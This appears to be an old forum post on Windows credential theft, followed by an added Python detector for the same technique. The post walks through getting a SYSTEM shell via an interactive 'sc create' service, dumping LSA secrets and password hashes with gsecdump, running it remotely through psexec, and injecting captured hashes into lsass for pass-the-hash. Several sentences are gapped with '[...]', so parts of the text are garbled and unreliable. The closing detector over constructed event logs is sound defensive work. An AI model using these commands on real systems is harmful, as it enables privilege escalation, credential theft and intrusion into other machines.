admin 2012-11-6 21:09:29

Hash injection method

To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
CreateService SUCCESS

C:\>sc start shellcmdline
StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

Here is a demonstration: using iam from the pshtools toolkit, inject the hash information just captured with gsecdump into the local lsass, which implements the hash injection method, [...] administrators' [...]. As for the LM/NT hashes obtained during ARP spoofing, or obtained with gethash, cracking them is actually [...], [...] very [...]; as the original author said: 4 to 127 characters, as long as you have the hash, it can be cracked 100%.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

Looking at the original, it seems to be [...]/2007/03/16/[...].
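Added example (Python, written for this page; it is not code from the post, from gsecdump or from PsExec): a small detector over constructed Windows System-log records that flags the pattern shown above, a service installed (event 7045) whose image is cmd.exe running as an interactive LocalSystem service and which then times out with error 1053 (event 7000), plus the PSEXESVC helper service that psexec -s drops. The records, the two-minute window and the interpreter list are assumptions for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample System-log records (not real telemetry). 7045 = "A service was
# installed", 7000 = "service failed to start"; fields mirror the event's data items.
EVENTS = [
    {"ts": "2012-11-06 21:05:01", "id": 7045, "name": "shellcmdline",
     "image": r"C:\WINDOWS\system32\cmd.exe /K start",
     "type": "user mode service (interactive)", "account": "LocalSystem"},
    {"ts": "2012-11-06 21:05:32", "id": 7000, "name": "shellcmdline",
     "error": "The service did not respond to the start or control request in a timely fashion."},
    {"ts": "2012-11-06 21:07:10", "id": 7045, "name": "PSEXESVC",
     "image": r"%SystemRoot%\PSEXESVC.exe", "type": "user mode service", "account": "LocalSystem"},
    {"ts": "2012-11-06 21:20:00", "id": 7045, "name": "Spooler",
     "image": r"%SystemRoot%\System32\spoolsv.exe", "type": "user mode service", "account": "LocalSystem"},
]

# Interpreters/shells that are never legitimate service images (assumed list).
SHELL_IMAGE = re.compile(r"\\(cmd|powershell|wscript|cscript|rundll32)\.exe\b", re.I)
TOOL_NAMES = {"psexesvc"}

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def suspicious_services(events, window=timedelta(minutes=2)):
    """Return {service_name: [reasons]} for 7045 installs worth triage."""
    installs = [e for e in events if e["id"] == 7045]
    failures = [e for e in events if e["id"] == 7000]
    findings = {}
    for ev in installs:
        reasons = []
        if SHELL_IMAGE.search(ev["image"]):
            reasons.append("service image is an interpreter/shell, not a service binary")
        if "interactive" in ev["type"].lower() and ev["account"] == "LocalSystem":
            reasons.append("interactive service running as LocalSystem")
        if ev["name"].lower() in TOOL_NAMES:
            reasons.append("remote-execution helper service (PsExec)")
        # A binary that never calls StartServiceCtrlDispatcher times out with error 1053
        # (event 7000) right after install; that pairing fingerprints the sc create trick.
        t0 = parse_ts(ev["ts"])
        if any(f["name"] == ev["name"] and t0 <= parse_ts(f["ts"]) <= t0 + window
               for f in failures):
            reasons.append("start timed out (1053) within the install window")
        if reasons:
            findings[ev["name"]] = reasons
    return findings

if __name__ == "__main__":
    for name, why in suspicious_services(EVENTS).items():
        print(name, "->", "; ".join(why))
```

On real hosts the same fields come from the System log (Service Control Manager, events 7045 and 7000) or from Security event 4697 where service-install auditing is enabled.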